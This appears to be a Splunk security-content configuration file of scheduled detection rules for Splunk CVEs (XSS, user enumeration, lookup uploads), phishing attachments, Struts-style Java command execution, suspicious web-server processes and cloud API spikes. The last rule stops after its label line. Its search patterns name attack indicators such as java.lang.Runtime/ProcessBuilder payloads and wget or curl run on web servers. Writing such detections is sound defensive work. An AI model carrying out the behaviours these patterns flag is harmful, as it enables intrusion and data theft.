[ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads.
action.escu.how_to_implement = Requires access to internal splunkd_access.
action.escu.known_false_positives = This is a hunting search; it provides information on upload, edit, and delete activity on Lookup Tables. Manual investigation is necessary after executing the search. This search will produce false positives as the payload cannot be directly discerned.
action.escu.creation_date = 2023-02-14
action.escu.modification_date = 2023-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Potential lookup template injection attempt from $user$ on lookup table at path $uri_path$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk unnecessary file extensions allowed by lookup table uploads - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22937"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, the lookup table uploads let a user upload lookup tables with unnecessary filename extensions. Lookup table file extensions may now only be one of .csv, .csv.gz, .kmz, .kml, .mmdb, or .mmdb.gz. This search provides user activity focus on uploads which aims to help hunt for malicious file uploads.
action.notable.param.rule_title = Splunk unnecessary file extensions allowed by lookup table uploads
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkda` method IN ("POST", "DELETE") uri_path=/servicesNS/*/ui/views/* | eval activity = case( method=="POST" AND like( uri_path , "%/acl" ) , "Permissions Update", method=="POST" AND NOT like( uri_path , "%/acl" ) , "Edited" , method=="DELETE" , "Deleted" ) | rex field=uri_path "(?<app>.*?)\/ui\/views/(?<dashboard_encoded>.*)" | eval dashboard = urldecode( dashboard_encoded ) | table _time, uri_path, user, dashboard, activity, uri_path | `splunk_unnecessary_file_extensions_allowed_by_lookup_table_uploads_filter`

[ESCU - Splunk User Enumeration Attempt - Rule]
action.escu = 0
action.escu.enabled = 1
description = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to find password spraying or brute force authorization attempts in addition to someone enumerating usernames.
action.escu.known_false_positives = Automation executing authentication attempts against your Splunk infrastructure with outdated credentials may cause false positives.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk User Enumeration Attempt - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = $TotalFailedAuths$ failed authentication events to Splunk from $src$ detected.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk User Enumeration Attempt - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2021-33845"], "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for username enumeration stemming from verbose login failure messages present on some REST endpoints. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.notable.param.rule_title = Splunk User Enumeration Attempt
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_failed_auths` | stats count(user) as auths by user, src | where auths>5 | stats values(user) as user, sum(auths) as TotalFailedAuths by src | `splunk_user_enumeration_attempt_filter`

[ESCU - Splunk XSS in Highlighted JSON Events - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection provides information about possible exploitation against affected versions of Splunk Enterprise 9.1.2. The ability to view JSON logs in the web GUI may be abused by crafting a specific request, causing the execution of JavaScript in script tags. This vulnerability can be used to execute JavaScript to access the API at the permission level of the logged-in user. If the user is an admin, it can be used to create an admin user, giving an attacker broad access to the Splunk environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection provides information about possible exploitation against affected versions of Splunk Enterprise 9.1.2. The ability to view JSON logs in the web GUI may be abused by crafting a specific request, causing the execution of JavaScript in script tags. This vulnerability can be used to execute JavaScript to access the API at the permission level of the logged-in user. If the user is an admin, it can be used to create an admin user, giving an attacker broad access to the Splunk environment.
action.escu.how_to_implement = This search only applies to web-GUI-enabled Splunk instances, and the operator must have access to internal indexes.
action.escu.known_false_positives = This is a hunting search and will produce false positives as it is not possible to view the contents of a request payload. It shows the artifact resulting from a potential exploitation payload (the creation of a user with admin privileges).
action.escu.creation_date = 2023-11-16
action.escu.modification_date = 2023-11-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk XSS in Highlighted JSON Events - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk XSS in Highlighted JSON Events - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_ui` "/en-US/splunkd/__raw/servicesNS/nobody/search/authentication/users" status=201 | stats count min(_time) as firstTime max(_time) as lastTime by clientip, uri_path, method | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_xss_in_highlighted_json_events_filter`

[ESCU - Splunk XSS in Monitoring Console - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection will find attempted exploitation of CVE-2022-27183.
action.escu.known_false_positives = Use of the monitoring console where the less-than sign (<) is the first character in the description field.
action.escu.creation_date = 2022-04-27
action.escu.modification_date = 2022-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk XSS in Monitoring Console - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = A potential XSS attempt has been detected from $user$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 40}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Splunk XSS in Monitoring Console - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-27183"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for a reflective Cross-Site Scripting (XSS) vulnerability stemming from the lack of input validation in the Distributed Monitoring Console app. This detection will alert on attempted exploitation in patched versions of Splunk as well as actual exploitation in unpatched versions of Splunk.
action.notable.param.rule_title = Splunk XSS in Monitoring Console
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_web` method="GET" uri_query="description=%3C*" | table _time host status clientip user uri | `splunk_xss_in_monitoring_console_filter`

[ESCU - Splunk XSS in Save table dialog header in search page - Rule]
action.escu = 0
action.escu.enabled = 1
description = This is a hunting search to find persistent cross-site scripting (XSS) code that was included while inputting data in the 'Save Table' dialog in Splunk Enterprise (8.1.12, 8.2.9, 9.0.2). A remote user with the "power" Splunk role can store this code, which can lead to persistent cross-site scripting.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This is a hunting search to find persistent cross-site scripting (XSS) code that was included while inputting data in the 'Save Table' dialog in Splunk Enterprise (8.1.12, 8.2.9, 9.0.2). A remote user with the "power" Splunk role can store this code, which can lead to persistent cross-site scripting.
action.escu.how_to_implement = Watch for POST requests combined with XSS script strings or obfuscation against the injection point /en-US/splunkd/__raw/servicesNS/nobody/search/datamodel/model.
action.escu.known_false_positives = If the host is vulnerable and XSS script strings are inputted, they will show up in the search. Not all POST requests are malicious, as they will show when users create and save dashboards. This search may produce several results with non-malicious POST requests. Only affects Splunk Web enabled instances.
action.escu.creation_date = 2022-10-11
action.escu.modification_date = 2022-10-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk XSS in Save table dialog header in search page - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk XSS in Save table dialog header in search page - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43561"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_webx` method=POST uri=/en-US/splunkd/__raw/servicesNS/nobody/search/datamodel/model | table _time host status clientip user uri | `splunk_xss_in_save_table_dialog_header_in_search_page_filter`

[ESCU - Splunk XSS via View - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. This hunting search shows the user action, application and role used for creating views related to this vulnerability.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a View allows for Cross-Site Scripting in an XML View through the 'layoutPanel' attribute in the 'module' tag. The vulnerability affects instances with Splunk Web enabled. This hunting search shows the user action, application and role used for creating views related to this vulnerability.
action.escu.how_to_implement = This data is collected by default in Splunk. Upon first enabling this rule, a number of errors may be observed. Those that are due to improperly formatted, but non-nefarious, XML views should be remedied in the corresponding view. Please take care investigating potential XSS, as accessing an affected page could retrigger the exploit.
action.escu.known_false_positives = The error detected above can be generated for a wide variety of improperly formatted XML views. There will be false positives as the search cannot extract the malicious payload, and the view should be manually investigated.
action.escu.creation_date = 2023-02-07
action.escu.modification_date = 2023-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk XSS via View - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk XSS via View - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22933"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = index = _internal sourcetype IN ("splunk_web_service", "splunk_python") message="*loadParams*" | `security_content_ctime(_time)` | table _time message fileName | `splunk_xss_via_view_filter`

[ESCU - Suspicious Email Attachment Extensions - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects emails that contain attachments with suspicious file extensions. Detecting and responding to emails with suspicious attachments can mitigate the risks associated with phishing and malware attacks, thereby protecting the organization's data and systems from potential harm. The detection is made by using a Splunk query that searches for emails in the datamodel=Email where the filename of the attachment is not empty. The analytic uses the tstats command to summarize the count, first time, and last time of the emails that meet the criteria. It groups the results by the source user, file name, and message ID of the email. The detection is important because it indicates potential phishing or malware delivery attempts in which an attacker attempts to deliver malicious content through email attachments, which can lead to data breaches, malware infections, or unauthorized access to sensitive information. Next steps include reviewing the identified emails and attachments and analyzing the source user, file name, and message ID to determine if they are legitimate or malicious. Additionally, you must inspect any relevant on-disk artifacts associated with the attachments and investigate any concurrent processes to identify the source of the attack.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]}
action.escu.data_models = ["Email"]
action.escu.eli5 = The following analytic detects emails that contain attachments with suspicious file extensions. Detecting and responding to emails with suspicious attachments can mitigate the risks associated with phishing and malware attacks, thereby protecting the organization's data and systems from potential harm. The detection is made by using a Splunk query that searches for emails in the datamodel=Email where the filename of the attachment is not empty. The analytic uses the tstats command to summarize the count, first time, and last time of the emails that meet the criteria. It groups the results by the source user, file name, and message ID of the email. The detection is important because it indicates potential phishing or malware delivery attempts in which an attacker attempts to deliver malicious content through email attachments, which can lead to data breaches, malware infections, or unauthorized access to sensitive information. Next steps include reviewing the identified emails and attachments and analyzing the source user, file name, and message ID to determine if they are legitimate or malicious. Additionally, you must inspect any relevant on-disk artifacts associated with the attachments and investigate any concurrent processes to identify the source of the attack.
action.escu.how_to_implement = You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. \
**Splunk Phantom Playbook Integration**\
If Splunk Phantom is also configured in your environment, a Playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Email Attachment Extensions - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Suspicious Email Attachment Extensions - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Emotet Malware DHS Report TA18-201A", "Hermetic Wiper", "Suspicious Emails"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.001", "T1566"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | `suspicious_email_attachments` | `suspicious_email_attachment_extensions_filter`

[ESCU - Suspicious Java Classes - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts.
action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your web-traffic appliances that serve or sit in the path of your Struts application servers. This can be accomplished by indexing data from a web proxy, or by using network traffic-analysis tools, such as Splunk Stream or Bro.
action.escu.known_false_positives = There are no known false positives.
action.escu.creation_date = 2018-12-06
action.escu.modification_date = 2018-12-06
action.escu.confidence = high
action.escu.full_search_name = ESCU - Suspicious Java Classes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Apache Struts Vulnerability"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Suspicious Java Classes - Rule
action.correlationsearch.annotations = {"analytic_story": ["Apache Struts Vulnerability"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime|processbuilder)" | rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time) as lastTime, values(url) as uri, values(status) as status, values(http_user_agent) as http_user_agent by src, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_java_classes_filter`

[ESCU - Web Servers Executing Suspicious Processes - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". It uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". It uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some of these processes may be used legitimately on web servers during maintenance or other administrative tasks.
action.escu.creation_date = 2019-04-01
action.escu.modification_date = 2019-04-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Web Servers Executing Suspicious Processes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Apache Struts Vulnerability"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Web Servers Executing Suspicious Processes - Rule
action.correlationsearch.annotations = {"analytic_story": ["Apache Struts Vulnerability"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects suspicious processes on systems labeled as web servers. This detection is made by a Splunk query that searches for specific process names that might indicate malicious activity. These suspicious processes include "whoami", "ping", "iptables", "wget", "service", and "curl". It uses the Splunk data model "Endpoint.Processes" and filters the results to only include systems categorized as web servers. This detection is important because it indicates unauthorized or malicious activity on web servers since these processes are commonly used by attackers to perform reconnaissance, establish persistence, or exfiltrate data from compromised systems. The impact of such an attack can be significant, ranging from data theft to the deployment of additional malicious payloads, potentially leading to ransomware or other damaging outcomes. False positives might occur since the legitimate use of these processes on web servers can trigger the analytic. Next steps include triaging and investigating to determine the legitimacy of the activity. Also, review the source and command of the suspicious process. You must also examine any relevant on-disk artifacts and look for concurrent processes to identify the source of the attack.
action.notable.param.rule_title = Web Servers Executing Suspicious Processes
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.dest_category="web_server" AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*" OR Processes.process="*wget*" OR Processes.process="*service*" OR Processes.process="*curl*") by Processes.process Processes.process_name, Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_servers_executing_suspicious_processes_filter`

[ESCU - Abnormally High Number Of Cloud Infrastructure API Calls - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search will detect a spike in the number of API calls made to your cloud infrastructure environment by a user.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs. You also must run the baseline search `Baseline Of Cloud Infrastructure API Calls Per User` to create the probability density function.
action.escu.known_false_positives = 
action.escu.creation_date = 2020-09-07
action.escu.modification_date = 2020-09-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Abnormally High Number Of Cloud Infrastructure API Calls - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud User Activities", "Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = user $user$ has made $api_calls$ api calls, violating the dynamic threshold of $expected_upper_threshold$ with the following command $command$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Abnormally High Number Of Cloud Infrastructure API Calls - Rule
